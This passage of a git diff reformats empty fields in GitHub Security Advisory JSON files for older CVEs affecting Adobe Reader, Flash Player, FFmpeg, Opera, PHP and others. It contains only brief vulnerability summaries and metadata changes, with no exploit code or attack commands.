b/advisories/unreviewed/2022/05/GHSA-cj48-gr7g-jvm7/GHSA-cj48-gr7g-jvm7.json @@ -7,12 +7,8 @@ "CVE-2011-0595" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0600.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cjqp-w58x-g83v/GHSA-cjqp-w58x-g83v.json b/advisories/unreviewed/2022/05/GHSA-cjqp-w58x-g83v/GHSA-cjqp-w58x-g83v.json index 0e03719a8b8..72e0ce75852 100644 --- a/advisories/unreviewed/2022/05/GHSA-cjqp-w58x-g83v/GHSA-cjqp-w58x-g83v.json +++ b/advisories/unreviewed/2022/05/GHSA-cjqp-w58x-g83v/GHSA-cjqp-w58x-g83v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cmgq-gqwf-mjfw/GHSA-cmgq-gqwf-mjfw.json b/advisories/unreviewed/2022/05/GHSA-cmgq-gqwf-mjfw/GHSA-cmgq-gqwf-mjfw.json index bb52535d8a1..368aea138c9 100644 --- a/advisories/unreviewed/2022/05/GHSA-cmgq-gqwf-mjfw/GHSA-cmgq-gqwf-mjfw.json +++ b/advisories/unreviewed/2022/05/GHSA-cmgq-gqwf-mjfw/GHSA-cmgq-gqwf-mjfw.json @@ -7,12 +7,8 @@ "CVE-2012-0849" ], "details": "Integer overflow in the ff_j2k_dwt_init function in libavcodec/j2k_dwt.c in FFmpeg before 0.9.1 allows remote attackers to cause a denial of service (segmentation fault and application crash) via a crafted JPEG2000 image that triggers an incorrect check for a negative value.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cmrq-rhmh-prvq/GHSA-cmrq-rhmh-prvq.json b/advisories/unreviewed/2022/05/GHSA-cmrq-rhmh-prvq/GHSA-cmrq-rhmh-prvq.json index 8f0400a244e..290867f0e65 100644 --- a/advisories/unreviewed/2022/05/GHSA-cmrq-rhmh-prvq/GHSA-cmrq-rhmh-prvq.json +++ b/advisories/unreviewed/2022/05/GHSA-cmrq-rhmh-prvq/GHSA-cmrq-rhmh-prvq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cmwg-v2gp-fqx6/GHSA-cmwg-v2gp-fqx6.json b/advisories/unreviewed/2022/05/GHSA-cmwg-v2gp-fqx6/GHSA-cmwg-v2gp-fqx6.json index d281586f9a4..2227d850b5c 100644 --- a/advisories/unreviewed/2022/05/GHSA-cmwg-v2gp-fqx6/GHSA-cmwg-v2gp-fqx6.json +++ b/advisories/unreviewed/2022/05/GHSA-cmwg-v2gp-fqx6/GHSA-cmwg-v2gp-fqx6.json @@ -7,12 +7,8 @@ "CVE-2008-5422" ], "details": "Sun Sun Ray Server Software 3.1 through 4.0 does not properly restrict access, which allows remote attackers to discover the Sun Ray administration password, and obtain admin access to the Data Store and Administration GUI, via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cq56-w8h5-cwcj/GHSA-cq56-w8h5-cwcj.json b/advisories/unreviewed/2022/05/GHSA-cq56-w8h5-cwcj/GHSA-cq56-w8h5-cwcj.json index fcbabe76680..46fb0550097 100644 --- a/advisories/unreviewed/2022/05/GHSA-cq56-w8h5-cwcj/GHSA-cq56-w8h5-cwcj.json +++ b/advisories/unreviewed/2022/05/GHSA-cq56-w8h5-cwcj/GHSA-cq56-w8h5-cwcj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cqv3-xg95-jpjv/GHSA-cqv3-xg95-jpjv.json b/advisories/unreviewed/2022/05/GHSA-cqv3-xg95-jpjv/GHSA-cqv3-xg95-jpjv.json index a54aff80511..494b42028cb 100644 --- a/advisories/unreviewed/2022/05/GHSA-cqv3-xg95-jpjv/GHSA-cqv3-xg95-jpjv.json +++ b/advisories/unreviewed/2022/05/GHSA-cqv3-xg95-jpjv/GHSA-cqv3-xg95-jpjv.json @@ -7,12 +7,8 @@ "CVE-2010-2660" ], "details": "Opera before 10.54 on Windows and Mac OS X, and before 10.60 on UNIX platforms, does not properly restrict certain uses of homograph characters in domain names, which makes it easier for remote attackers to spoof IDN domains via unspecified choices of characters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cv37-69v6-g3cw/GHSA-cv37-69v6-g3cw.json b/advisories/unreviewed/2022/05/GHSA-cv37-69v6-g3cw/GHSA-cv37-69v6-g3cw.json index 6a62d4da0c6..fb18b422a0e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv37-69v6-g3cw/GHSA-cv37-69v6-g3cw.json +++ b/advisories/unreviewed/2022/05/GHSA-cv37-69v6-g3cw/GHSA-cv37-69v6-g3cw.json @@ -7,12 +7,8 @@ "CVE-2011-0605" ], "details": "Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cv59-f4p2-3vrq/GHSA-cv59-f4p2-3vrq.json b/advisories/unreviewed/2022/05/GHSA-cv59-f4p2-3vrq/GHSA-cv59-f4p2-3vrq.json index 2fd27179f4b..a41799b9926 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv59-f4p2-3vrq/GHSA-cv59-f4p2-3vrq.json +++ b/advisories/unreviewed/2022/05/GHSA-cv59-f4p2-3vrq/GHSA-cv59-f4p2-3vrq.json @@ -7,12 +7,8 @@ "CVE-2010-2174" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, might allow attackers to execute arbitrary code via unspecified vectors, related to an \"invalid pointer vulnerability\" and the newfunction (0x44) operator, a different vulnerability than CVE-2010-2173.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cv5q-mhpr-crqp/GHSA-cv5q-mhpr-crqp.json b/advisories/unreviewed/2022/05/GHSA-cv5q-mhpr-crqp/GHSA-cv5q-mhpr-crqp.json index 5a64eb34178..2a86bf3d6cf 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv5q-mhpr-crqp/GHSA-cv5q-mhpr-crqp.json +++ b/advisories/unreviewed/2022/05/GHSA-cv5q-mhpr-crqp/GHSA-cv5q-mhpr-crqp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cv97-45j6-8wc2/GHSA-cv97-45j6-8wc2.json b/advisories/unreviewed/2022/05/GHSA-cv97-45j6-8wc2/GHSA-cv97-45j6-8wc2.json index f60d35df27c..6bdf9a1a90a 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv97-45j6-8wc2/GHSA-cv97-45j6-8wc2.json +++ b/advisories/unreviewed/2022/05/GHSA-cv97-45j6-8wc2/GHSA-cv97-45j6-8wc2.json @@ -7,12 +7,8 @@ "CVE-2011-0708" ], "details": "exif.c in the Exif extension in PHP before 5.3.6 on 64-bit platforms performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) via an image with a crafted Image File Directory (IFD) that triggers a buffer over-read.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cwfg-p2v5-w3pq/GHSA-cwfg-p2v5-w3pq.json b/advisories/unreviewed/2022/05/GHSA-cwfg-p2v5-w3pq/GHSA-cwfg-p2v5-w3pq.json index 3fba88b403d..3429eec1f00 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwfg-p2v5-w3pq/GHSA-cwfg-p2v5-w3pq.json +++ b/advisories/unreviewed/2022/05/GHSA-cwfg-p2v5-w3pq/GHSA-cwfg-p2v5-w3pq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cwjf-rrwx-48w3/GHSA-cwjf-rrwx-48w3.json b/advisories/unreviewed/2022/05/GHSA-cwjf-rrwx-48w3/GHSA-cwjf-rrwx-48w3.json index cfcbbd30734..e8a9344a6c3 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwjf-rrwx-48w3/GHSA-cwjf-rrwx-48w3.json +++ b/advisories/unreviewed/2022/05/GHSA-cwjf-rrwx-48w3/GHSA-cwjf-rrwx-48w3.json @@ -7,12 +7,8 @@ "CVE-2011-0579" ], "details": "Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cxvv-q582-f9c6/GHSA-cxvv-q582-f9c6.json b/advisories/unreviewed/2022/05/GHSA-cxvv-q582-f9c6/GHSA-cxvv-q582-f9c6.json index 8917c2b17b9..9a169ec622e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cxvv-q582-f9c6/GHSA-cxvv-q582-f9c6.json +++ b/advisories/unreviewed/2022/05/GHSA-cxvv-q582-f9c6/GHSA-cxvv-q582-f9c6.json @@ -7,12 +7,8 @@ "CVE-2011-2134" ], "details": "Buffer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2130, CVE-2011-2137, CVE-2011-2414, and CVE-2011-2415.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f2pw-f5xq-c3x9/GHSA-f2pw-f5xq-c3x9.json b/advisories/unreviewed/2022/05/GHSA-f2pw-f5xq-c3x9/GHSA-f2pw-f5xq-c3x9.json index 7220f76f561..faf23b3faff 100644 --- a/advisories/unreviewed/2022/05/GHSA-f2pw-f5xq-c3x9/GHSA-f2pw-f5xq-c3x9.json +++ b/advisories/unreviewed/2022/05/GHSA-f2pw-f5xq-c3x9/GHSA-f2pw-f5xq-c3x9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f353-7g26-pffr/GHSA-f353-7g26-pffr.json b/advisories/unreviewed/2022/05/GHSA-f353-7g26-pffr/GHSA-f353-7g26-pffr.json index 13dfa777972..b5e4d5fa3c4 100644 --- a/advisories/unreviewed/2022/05/GHSA-f353-7g26-pffr/GHSA-f353-7g26-pffr.json +++ b/advisories/unreviewed/2022/05/GHSA-f353-7g26-pffr/GHSA-f353-7g26-pffr.json @@ -7,12 +7,8 @@ "CVE-2010-3632" ], "details": "Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3658.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f49x-vv2c-r87m/GHSA-f49x-vv2c-r87m.json b/advisories/unreviewed/2022/05/GHSA-f49x-vv2c-r87m/GHSA-f49x-vv2c-r87m.json index c41eacb8ce9..b2e9cd56f0d 100644 --- a/advisories/unreviewed/2022/05/GHSA-f49x-vv2c-r87m/GHSA-f49x-vv2c-r87m.json +++ b/advisories/unreviewed/2022/05/GHSA-f49x-vv2c-r87m/GHSA-f49x-vv2c-r87m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f4c4-x5r3-jc4r/GHSA-f4c4-x5r3-jc4r.json b/advisories/unreviewed/2022/05/GHSA-f4c4-x5r3-jc4r/GHSA-f4c4-x5r3-jc4r.json index 94e9e11c385..c38b9f24910 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4c4-x5r3-jc4r/GHSA-f4c4-x5r3-jc4r.json +++ b/advisories/unreviewed/2022/05/GHSA-f4c4-x5r3-jc4r/GHSA-f4c4-x5r3-jc4r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f4cw-6r4q-vjw9/GHSA-f4cw-6r4q-vjw9.json b/advisories/unreviewed/2022/05/GHSA-f4cw-6r4q-vjw9/GHSA-f4cw-6r4q-vjw9.json index cfcb8639dfb..bcf4d81a192 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4cw-6r4q-vjw9/GHSA-f4cw-6r4q-vjw9.json +++ b/advisories/unreviewed/2022/05/GHSA-f4cw-6r4q-vjw9/GHSA-f4cw-6r4q-vjw9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f4vq-5p8h-hqjx/GHSA-f4vq-5p8h-hqjx.json b/advisories/unreviewed/2022/05/GHSA-f4vq-5p8h-hqjx/GHSA-f4vq-5p8h-hqjx.json index 01851ef79cf..e5ce0e94452 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4vq-5p8h-hqjx/GHSA-f4vq-5p8h-hqjx.json +++ b/advisories/unreviewed/2022/05/GHSA-f4vq-5p8h-hqjx/GHSA-f4vq-5p8h-hqjx.json @@ -7,12 +7,8 @@ "CVE-2010-3911" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in vtiger CRM before 5.2.1 allow remote attackers to inject arbitrary web script or HTML via (1) the username (aka default_user_name) field or (2) the password field in a Users Login action to index.php, or (3) the label parameter in a Settings GetFieldInfo action to index.php, related to modules/Settings/GetFieldInfo.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f5gw-wx32-xw5r/GHSA-f5gw-wx32-xw5r.json b/advisories/unreviewed/2022/05/GHSA-f5gw-wx32-xw5r/GHSA-f5gw-wx32-xw5r.json index 5676f344688..b8509a65d37 100644 --- a/advisories/unreviewed/2022/05/GHSA-f5gw-wx32-xw5r/GHSA-f5gw-wx32-xw5r.json +++ b/advisories/unreviewed/2022/05/GHSA-f5gw-wx32-xw5r/GHSA-f5gw-wx32-xw5r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f5pw-7229-3wqr/GHSA-f5pw-7229-3wqr.json b/advisories/unreviewed/2022/05/GHSA-f5pw-7229-3wqr/GHSA-f5pw-7229-3wqr.json index 7434f316c24..6dfc3280331 100644 --- a/advisories/unreviewed/2022/05/GHSA-f5pw-7229-3wqr/GHSA-f5pw-7229-3wqr.json +++ b/advisories/unreviewed/2022/05/GHSA-f5pw-7229-3wqr/GHSA-f5pw-7229-3wqr.json @@ -7,12 +7,8 @@ "CVE-2012-2774" ], "details": "The ff_MPV_frame_start function in libavcodec/mpegvideo.c in FFmpeg before 0.11 allows remote attackers to cause a denial of service (memory corruption) via unspecified vectors, related to starting \"a frame outside SETUP state.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f65r-f4fc-g93f/GHSA-f65r-f4fc-g93f.json b/advisories/unreviewed/2022/05/GHSA-f65r-f4fc-g93f/GHSA-f65r-f4fc-g93f.json index cb799a1f2a1..5120dec556b 100644 --- a/advisories/unreviewed/2022/05/GHSA-f65r-f4fc-g93f/GHSA-f65r-f4fc-g93f.json +++ b/advisories/unreviewed/2022/05/GHSA-f65r-f4fc-g93f/GHSA-f65r-f4fc-g93f.json @@ -7,12 +7,8 @@ "CVE-2012-2795" ], "details": "Multiple unspecified vulnerabilities in libavcodec/wmalosslessdec.c in FFmpeg before 0.11 have unknown impact and attack vectors related to (1) size of \"mclms arrays,\" (2) \"a get_bits(0) in decode_ac_filter,\" and (3) \"too many bits in decode_channel_residues().\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f6rr-c89r-f66w/GHSA-f6rr-c89r-f66w.json b/advisories/unreviewed/2022/05/GHSA-f6rr-c89r-f66w/GHSA-f6rr-c89r-f66w.json index 04d30f0541c..d30cfe58854 100644 --- a/advisories/unreviewed/2022/05/GHSA-f6rr-c89r-f66w/GHSA-f6rr-c89r-f66w.json +++ b/advisories/unreviewed/2022/05/GHSA-f6rr-c89r-f66w/GHSA-f6rr-c89r-f66w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f765-qh69-h7vc/GHSA-f765-qh69-h7vc.json b/advisories/unreviewed/2022/05/GHSA-f765-qh69-h7vc/GHSA-f765-qh69-h7vc.json index 3ecfbe03392..268e578ba4c 100644 --- a/advisories/unreviewed/2022/05/GHSA-f765-qh69-h7vc/GHSA-f765-qh69-h7vc.json +++ b/advisories/unreviewed/2022/05/GHSA-f765-qh69-h7vc/GHSA-f765-qh69-h7vc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f7p7-p4m6-xxhq/GHSA-f7p7-p4m6-xxhq.json b/advisories/unreviewed/2022/05/GHSA-f7p7-p4m6-xxhq/GHSA-f7p7-p4m6-xxhq.json index 943a4da467f..b57f812adac 100644 --- a/advisories/unreviewed/2022/05/GHSA-f7p7-p4m6-xxhq/GHSA-f7p7-p4m6-xxhq.json +++ b/advisories/unreviewed/2022/05/GHSA-f7p7-p4m6-xxhq/GHSA-f7p7-p4m6-xxhq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f836-847g-vm3c/GHSA-f836-847g-vm3c.json b/advisories/unreviewed/2022/05/GHSA-f836-847g-vm3c/GHSA-f836-847g-vm3c.json index f2ff7795eb2..58d4af2eade 100644 --- a/advisories/unreviewed/2022/05/GHSA-f836-847g-vm3c/GHSA-f836-847g-vm3c.json +++ b/advisories/unreviewed/2022/05/GHSA-f836-847g-vm3c/GHSA-f836-847g-vm3c.json @@ -7,12 +7,8 @@ "CVE-2011-2138" ], "details": "Integer overflow in Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2011-2136 and CVE-2011-2416.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -56,9 +52,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f86h-p5cj-45cr/GHSA-f86h-p5cj-45cr.json b/advisories/unreviewed/2022/05/GHSA-f86h-p5cj-45cr/GHSA-f86h-p5cj-45cr.json index 6e84f771cf6..8e8655c0406 100644 --- a/advisories/unreviewed/2022/05/GHSA-f86h-p5cj-45cr/GHSA-f86h-p5cj-45cr.json +++ b/advisories/unreviewed/2022/05/GHSA-f86h-p5cj-45cr/GHSA-f86h-p5cj-45cr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f93f-gwg4-7g2c/GHSA-f93f-gwg4-7g2c.json b/advisories/unreviewed/2022/05/GHSA-f93f-gwg4-7g2c/GHSA-f93f-gwg4-7g2c.json index 006a39fa279..6814b3c721e 100644 --- a/advisories/unreviewed/2022/05/GHSA-f93f-gwg4-7g2c/GHSA-f93f-gwg4-7g2c.json +++ b/advisories/unreviewed/2022/05/GHSA-f93f-gwg4-7g2c/GHSA-f93f-gwg4-7g2c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f9hm-9p3q-v78c/GHSA-f9hm-9p3q-v78c.json b/advisories/unreviewed/2022/05/GHSA-f9hm-9p3q-v78c/GHSA-f9hm-9p3q-v78c.json index 9810ee1c72e..991401ba9ea 100644 --- a/advisories/unreviewed/2022/05/GHSA-f9hm-9p3q-v78c/GHSA-f9hm-9p3q-v78c.json +++ b/advisories/unreviewed/2022/05/GHSA-f9hm-9p3q-v78c/GHSA-f9hm-9p3q-v78c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fcfq-3ccf-xx7r/GHSA-fcfq-3ccf-xx7r.json b/advisories/unreviewed/2022/05/GHSA-fcfq-3ccf-xx7r/GHSA-fcfq-3ccf-xx7r.json index bb56c6f0d93..7139c9ff393 100644 --- a/advisories/unreviewed/2022/05/GHSA-fcfq-3ccf-xx7r/GHSA-fcfq-3ccf-xx7r.json +++ b/advisories/unreviewed/2022/05/GHSA-fcfq-3ccf-xx7r/GHSA-fcfq-3ccf-xx7r.json @@ -7,12 +7,8 @@ "CVE-2008-4619" ], "details": "The RPC subsystem in Sun Solaris 9 allows remote attackers to cause a denial of service (daemon crash) via a crafted request to procedure 8 in program 100000 (rpcbind), related to the XDR_DECODE operation and the taddr2uaddr function. NOTE: this might be a duplicate of CVE-2007-0165.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ff7q-9j5g-56pg/GHSA-ff7q-9j5g-56pg.json b/advisories/unreviewed/2022/05/GHSA-ff7q-9j5g-56pg/GHSA-ff7q-9j5g-56pg.json index e4579630333..09d6d2f0195 100644 --- a/advisories/unreviewed/2022/05/GHSA-ff7q-9j5g-56pg/GHSA-ff7q-9j5g-56pg.json +++ b/advisories/unreviewed/2022/05/GHSA-ff7q-9j5g-56pg/GHSA-ff7q-9j5g-56pg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ff7w-pqjq-vf8m/GHSA-ff7w-pqjq-vf8m.json b/advisories/unreviewed/2022/05/GHSA-ff7w-pqjq-vf8m/GHSA-ff7w-pqjq-vf8m.json index 53c5dde9a18..c75865916d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-ff7w-pqjq-vf8m/GHSA-ff7w-pqjq-vf8m.json +++ b/advisories/unreviewed/2022/05/GHSA-ff7w-pqjq-vf8m/GHSA-ff7w-pqjq-vf8m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-ffq4-j74j-h6c4/GHSA-ffq4-j74j-h6c4.json b/advisories/unreviewed/2022/05/GHSA-ffq4-j74j-h6c4/GHSA-ffq4-j74j-h6c4.json index 80b18d6aeee..d7996b88ead 100644 --- a/advisories/unreviewed/2022/05/GHSA-ffq4-j74j-h6c4/GHSA-ffq4-j74j-h6c4.json +++ b/advisories/unreviewed/2022/05/GHSA-ffq4-j74j-h6c4/GHSA-ffq4-j74j-h6c4.json @@ -7,12 +7,8 @@ "CVE-2010-2664" ], "details": "Opera before 10.60 allows remote attackers to cause a denial of service (application hang) via certain HTML content that has an unclosed SPAN element with absolute positioning.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-ffxf-wqw7-4589/GHSA-ffxf-wqw7-4589.json b/advisories/unreviewed/2022/05/GHSA-ffxf-wqw7-4589/GHSA-ffxf-wqw7-4589.json index 87f1fc4e16f..09bea16da17 100644 --- a/advisories/unreviewed/2022/05/GHSA-ffxf-wqw7-4589/GHSA-ffxf-wqw7-4589.json +++ b/advisories/unreviewed/2022/05/GHSA-ffxf-wqw7-4589/GHSA-ffxf-wqw7-4589.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-fgfw-9qp4-g6xg/GHSA-fgfw-9qp4-g6xg.json b/advisories/unreviewed/2022/05/GHSA-fgfw-9qp4-g6xg/GHSA-fgfw-9qp4-g6xg.json index 35f8e4b3f58..a6de4c122fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-fgfw-9qp4-g6xg/GHSA-fgfw-9qp4-g6xg.json +++ b/advisories/unreviewed/2022/05/GHSA-fgfw-9qp4-g6xg/GHSA-fgfw-9qp4-g6xg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git 